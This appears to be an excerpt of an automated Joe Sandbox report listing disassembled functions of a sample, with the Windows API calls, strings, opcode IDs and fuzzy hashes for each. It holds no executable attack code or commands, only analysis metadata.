                                                              • Opcode ID: d4c11964ac083952f85d36bb5124cf1026eb255012f6bf1011ae19488484b701
                                                              • Instruction ID: 732b67c96382c078a5d8c15b649db4122c3a4124afa6f6d102c309c124cc9ddb
                                                              • Opcode Fuzzy Hash: d4c11964ac083952f85d36bb5124cf1026eb255012f6bf1011ae19488484b701
                                                              • Instruction Fuzzy Hash: ED518071B00205AFDB08DFB8DD89AAEBBB6EB88310F14863DF909D7290D7709D058B14
                                                              APIs
                                                                • Part of subcall function 00431B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00432036,?,00000000,?,?,?,?,004316CB,00000000,?), ref: 00431B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004320D3
                                                              • KillTimer.USER32(-00000001,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0043216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0046BCA6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0046BCD7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0046BCEE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0046BD0A
                                                              • DeleteObject.GDI32(00000000), ref: 0046BD1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: f6ec999343867c35bd6b91e5a7b56598614890a67f76569c0f483601ded439db
                                                              • Instruction ID: 2587c9c70917d8800456710b829310d28c9f2d1f3d081665827f4c103da75067
                                                              • Opcode Fuzzy Hash: f6ec999343867c35bd6b91e5a7b56598614890a67f76569c0f483601ded439db
                                                              • Instruction Fuzzy Hash: B8617F30100A10DFCB29AF15DE48B2A77F1FB44315F50953EE6428A670D7B8A8A5DB99
                                                              APIs
                                                                • Part of subcall function 004325DB: GetWindowLongW.USER32(?,000000EB), ref: 004325EC
                                                              • GetSysColor.USER32(0000000F), ref: 004321D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 205f7d6e263c52f9b304e55d9acb75771ec56a8f4f8766a35445986154812256
                                                              • Instruction ID: c11efd2f2817f6c8e4ee9b50b5b1722f7bc3a5747d3fcc9f93d4093488074c78
                                                              • Opcode Fuzzy Hash: 205f7d6e263c52f9b304e55d9acb75771ec56a8f4f8766a35445986154812256
                                                              • Instruction Fuzzy Hash: 5A41B331000640EBDB255F28DD88BBA3B65EB0A331F1453B6FE658A2E2D7758C42DB59
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,004BF910), ref: 0049A90B
                                                              • GetDriveTypeW.KERNEL32(00000061,004E89A0,00000061), ref: 0049A9D5
                                                              • _wcscpy.LIBCMT ref: 0049A9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: ed5525bb613458fb95a7e4080db6e9364ac51fa2087a6dab42ee9b80200b12ab
                                                              • Instruction ID: 3fce7ad971d85a49d1b33a2ad1ecfb0a63079a63df5b7caebdb89859b2a7e5d2
                                                              • Opcode Fuzzy Hash: ed5525bb613458fb95a7e4080db6e9364ac51fa2087a6dab42ee9b80200b12ab
                                                              • Instruction Fuzzy Hash: DE51B0711083009BCB14EF15C892A6FBBA5FF94308F10482FF885572A2DB799D19CA9B
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __i64tow__itow__swprintf
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 421087845-2263619337
                                                              • Opcode ID: 62b297b4916753aa7dbc0ff711f850ab1832965202eb3919ef4dc4706e17e294
                                                              • Instruction ID: 106f7434d101ab25cdda73a18b722dd05ea441c5f996f2bc4741faabbedb7c64
                                                              • Opcode Fuzzy Hash: 62b297b4916753aa7dbc0ff711f850ab1832965202eb3919ef4dc4706e17e294
                                                              • Instruction Fuzzy Hash: FF410B71510205AFEB24EF35D841E7673E8FF49304F20446FE98AD7242FA799D068B19
                                                              APIs
                                                              • _memset.LIBCMT ref: 004B716A
                                                              • CreateMenu.USER32 ref: 004B7185
                                                              • SetMenu.USER32(?,00000000), ref: 004B7194
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B7221
                                                              • IsMenu.USER32(?), ref: 004B7237
                                                              • CreatePopupMenu.USER32 ref: 004B7241
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004B726E
                                                              • DrawMenuBar.USER32 ref: 004B7276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0$F
                                                              • API String ID: 176399719-3044882817
                                                              • Opcode ID: aaa36d52bb05538d5b64c08f72229d3e6af93333293e10aade05f70b6effb3d5
                                                              • Instruction ID: 8e7815a0e7cebc11e547610150b2d2a93e0f740356776be17ed3a0ce42c75b70
                                                              • Opcode Fuzzy Hash: aaa36d52bb05538d5b64c08f72229d3e6af93333293e10aade05f70b6effb3d5
                                                              • Instruction Fuzzy Hash: 0A418A74A01205EFDB24DF64D984EDA7BB5FF48340F14016AF906A7361D735A924CFA8
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004B755E
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 004B7565
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004B7578
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004B7580
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 004B758B
                                                              • DeleteDC.GDI32(00000000), ref: 004B7594
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 004B759E
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004B75B2
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004B75BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 323e0a9092abe90a23d352ba05eb2956fabfcd715aff51e3e0f7cbfd78545d9f
                                                              • Instruction ID: 7195d54fa75e63269f1ac0a26109b20171f8a86d105de0f6c6198a8f0d25bcd5
                                                              • Opcode Fuzzy Hash: 323e0a9092abe90a23d352ba05eb2956fabfcd715aff51e3e0f7cbfd78545d9f
                                                              • Instruction Fuzzy Hash: 4A316E71104214BBDF219F74DC08FDB3B69EF49364F110326FA19961A0C735D825DBA8
                                                              APIs
                                                              • _memset.LIBCMT ref: 00456E3E
                                                                • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
                                                              • __gmtime64_s.LIBCMT ref: 00456ED7
                                                              • __gmtime64_s.LIBCMT ref: 00456F0D
                                                              • __gmtime64_s.LIBCMT ref: 00456F2A
                                                              • __allrem.LIBCMT ref: 00456F80
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00456F9C
                                                              • __allrem.LIBCMT ref: 00456FB3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00456FD1
                                                              • __allrem.LIBCMT ref: 00456FE8
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00457006
                                                              • __invoke_watson.LIBCMT ref: 00457077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction ID: a14f19b930f9ac8ef8cebff22dd058a6f423dd34b721c0d4882b950413bb61d3
                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction Fuzzy Hash: 4F71F672A00716ABD714AE69DC42B5BB3E8AF05729F10423FF914D72C2F778D9088799
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492542
                                                              • GetMenuItemInfoW.USER32(004F5890,000000FF,00000000,00000030), ref: 004925A3
                                                              • SetMenuItemInfoW.USER32(004F5890,00000004,00000000,00000030), ref: 004925D9
                                                              • Sleep.KERNEL32(000001F4), ref: 004925EB
                                                              • GetMenuItemCount.USER32(?), ref: 0049262F
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0049264B
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00492675
                                                              • GetMenuItemID.USER32(?,?), ref: 004926BA
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00492700
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00492714
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00492735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: 3b87fc2916457d71b56fea74a0d5a9ac9bd288ee9a3b13301cc912bbbe8c554f
                                                              • Instruction ID: dbc49e5549135cd2dc4ab98f07eb7c6c0a4fe0bd8ffefd94e20d7a5b2c0f3f7d
                                                              • Opcode Fuzzy Hash: 3b87fc2916457d71b56fea74a0d5a9ac9bd288ee9a3b13301cc912bbbe8c554f
                                                              • Instruction Fuzzy Hash: EA618D70900249BFDF21CFA4DE88DAF7FA9EB01344F14017AE841A3251D7B9AD15DB29
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004B6FA5
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004B6FA8
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004B6FCC
                                                              • _memset.LIBCMT ref: 004B6FDD
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004B6FEF
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004B7067
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 99459b94f0e7f231bfee6111ff60b554e45c5d4db159e4667b85d8079d40af0e
                                                              • Instruction ID: cf32cd220a9cbfeb1e1bbe0a9ec4565ae1f1eeab2eb4cc3feaaca34f654058dd
                                                              • Opcode Fuzzy Hash: 99459b94f0e7f231bfee6111ff60b554e45c5d4db159e4667b85d8079d40af0e
                                                              • Instruction Fuzzy Hash: EA618C71900208AFDB10DFA8CC81EEE77F8EB48704F10016AFA14AB3A1C775AD55CB68
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00486BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00486C18
• VariantInit.OLEAUT32(?), ref: 00486C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00486C4A
• VariantCopy.OLEAUT32(?,?), ref: 00486C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00486CB1
• VariantClear.OLEAUT32(?), ref: 00486CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00486CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00486CDC
• VariantClear.OLEAUT32(?), ref: 00486CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00486CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 56b25182e94226c207c8f672129e532f51597e911a254db144212d617acb63ba
• Instruction ID: 89c0c8668f5235e942db031c44b88ff926aa63ec91ee2484d1d3a54a9f8c05a8
• Opcode Fuzzy Hash: 56b25182e94226c207c8f672129e532f51597e911a254db144212d617acb63ba
• Instruction Fuzzy Hash: 38418171A002199FCF00EFA9DC44DAEBBB9EF18304F01857AE955E7261CB74A949CF94
APIs
  • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
  • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
• CoInitialize.OLE32 ref: 004A8403
• CoUninitialize.OLE32 ref: 004A840E
• CoCreateInstance.OLE32(?,00000000,00000017,004C2BEC,?), ref: 004A846E
• IIDFromString.OLE32(?,?), ref: 004A84E1
• VariantInit.OLEAUT32(?), ref: 004A857B
• VariantClear.OLEAUT32(?), ref: 004A85DC
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: 38cf6368a69d6c0dc35d5d712b2707096ae5433c1192098cb8b640f8e9333425
• Instruction ID: 4e1a14bc059534469697640cb27a371e14510077ae59516e284d1cac5ea876f2
• Opcode Fuzzy Hash: 38cf6368a69d6c0dc35d5d712b2707096ae5433c1192098cb8b640f8e9333425
• Instruction Fuzzy Hash: C061BD70608312AFC710DF15C848B5BBBE4EF5A754F10091EF9859B291DB78ED48CB9A
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 004A5793
• inet_addr.WSOCK32(?,?,?), ref: 004A57D8
• gethostbyname.WSOCK32(?), ref: 004A57E4
• IcmpCreateFile.IPHLPAPI ref: 004A57F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004A5862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004A5878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 004A58ED
• WSACleanup.WSOCK32 ref: 004A58F3
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 95dfb5c67b6eda7509212e534723f8ba617c83277021071092ede6c0ded868df
• Instruction ID: ef55c1f3d3c1ed4add505aba7e95ab319407d137a1e756dd967045335c95c7ca
• Opcode Fuzzy Hash: 95dfb5c67b6eda7509212e534723f8ba617c83277021071092ede6c0ded868df
• Instruction Fuzzy Hash: 1C51BE316006009FDB10AF25DD85B2AB7E4EF59314F04496EF95ADB2A1DB78EC04CB4A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0049B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0049B546
• GetLastError.KERNEL32 ref: 0049B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0049B5BD
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 966de2861277ab767cf3871a5ba5ff82d5fdbb7d9cf3e8b33d7365eef717f41a
• Instruction ID: 441496e829d23f7d4858f60fdda6ec3b7af44fbf606fcad667fd84f9629a35f9
• Opcode Fuzzy Hash: 966de2861277ab767cf3871a5ba5ff82d5fdbb7d9cf3e8b33d7365eef717f41a
• Instruction Fuzzy Hash: B531A475A00209EFCF00EB69D945AAE7BB4EF48329F11417BF50597291DB789E02CB89
APIs
  • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
  • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00489014
• GetDlgCtrlID.USER32 ref: 0048901F
• GetParent.USER32 ref: 0048903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0048903E
• GetDlgCtrlID.USER32(?), ref: 00489047
• GetParent.USER32(?), ref: 00489063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00489066
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: b04255cbfea6588cf6d0799448f528c8d631083dfd63c6bf770b433af1082181
• Instruction ID: ab5b32e2ed83c71e433c5ddda9c81a79fbc61a1e82d471de9583cc77d5f786a6
• Opcode Fuzzy Hash: b04255cbfea6588cf6d0799448f528c8d631083dfd63c6bf770b433af1082181
• Instruction Fuzzy Hash: BD21D670A00108BBDF05BBA1CC85EFEBB74EF49310F10062BF961972A1DB795819DB28
APIs
  • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
  • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004890FD
• GetDlgCtrlID.USER32 ref: 00489108
• GetParent.USER32 ref: 00489124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00489127
• GetDlgCtrlID.USER32(?), ref: 00489130
• GetParent.USER32(?), ref: 0048914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0048914F
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: a59f3515d38f59a70039aad1afd6e1cf908ea9b20e73abf69f2c7bcc0d9ebbb8
• Instruction ID: 4827877aeb4097e2f04d8ff510d4ca282f3379f49608db35cfba4bb1d4166000
• Opcode Fuzzy Hash: a59f3515d38f59a70039aad1afd6e1cf908ea9b20e73abf69f2c7bcc0d9ebbb8
• Instruction Fuzzy Hash: 1A21F574A00108BBDF15BBA5CC89EFEBB74EF48300F54052BB955972A1DB79481ADB28
APIs
• GetParent.USER32 ref: 0048916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00489184
• _wcscmp.LIBCMT ref: 00489196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00489211
Strings
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: ccd08efe1cbeeb0425dc0c62e0051d541029b762dc9c7bc51727f30f2e304f34
• Instruction ID: 0ee97c28f86f63f39701a342d2d5fe4a96fefde76c35ce640c92939f30b76d44
• Opcode Fuzzy Hash: ccd08efe1cbeeb0425dc0c62e0051d541029b762dc9c7bc51727f30f2e304f34
• Instruction Fuzzy Hash: 0F11C476248707BAFA113625EC0BDBB379CAF15731B240867FD00A4092EEA96C565A5C
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00497A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 6b9177930767a8ae8cc7c5956e5e49ffaaf02c4e07ec7ccd2f98bf1ac6a452f4
• Instruction ID: c90c40b48ffb004aa04212abd5662e22d3a8ed71bd8ede1e22e075831c5eb0e8
• Opcode Fuzzy Hash: 6b9177930767a8ae8cc7c5956e5e49ffaaf02c4e07ec7ccd2f98bf1ac6a452f4
• Instruction Fuzzy Hash: 28B18C7191420A9FDF00DFA5C885BBEBBB4FF09325F24443AEA41E7241D738A945CB99
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0043FAA6
• OleUninitialize.OLE32(?,00000000), ref: 0043FB45
• UnregisterHotKey.USER32(?), ref: 0043FC9C
• DestroyWindow.USER32(?), ref: 004745D6
• FreeLibrary.KERNEL32(?), ref: 0047463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00474668
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 8f2e389714c719354cbde0466c87489461989a47a496be925347cfd7fe0f3941
• Instruction ID: c93e8c73a206935f06161e1c9a4929b622329a824bd30310f2c7086d353670ad
• Opcode Fuzzy Hash: 8f2e389714c719354cbde0466c87489461989a47a496be925347cfd7fe0f3941
• Instruction Fuzzy Hash: 14A18070701112CFDB18EF15C594A7AF364BF49704F1192AEE80AAB261DB38ED1ACF59
APIs
Strings
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,L$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
APIs
• EnumChildWindows.USER32(?,0048A439), ref: 0048A377
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00432EAE
  • Part of subcall function 00431DB3: GetClientRect.USER32(?,?), ref: 00431DDC
  • Part of subcall function 00431DB3: GetWindowRect.USER32(?,?), ref: 00431E1D
  • Part of subcall function 00431DB3: ScreenToClient.USER32(?,?), ref: 00431E45
• GetDC.USER32 ref: 0046CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0046CD45
• SelectObject.GDI32(00000000,00000000), ref: 0046CD53
• SelectObject.GDI32(00000000,00000000), ref: 0046CD68
• ReleaseDC.USER32(?,00000000), ref: 0046CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0046CDFB
Strings
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004A1A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004A1A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004A1ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004A1AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004A1AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004A1B10
• InternetCloseHandle.WININET(00000000), ref: 004A1B57
  • Part of subcall function 004A2483: GetLastError.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A2498
  • Part of subcall function 004A2483: SetEvent.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A24AD
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,004BF910), ref: 004A8D28
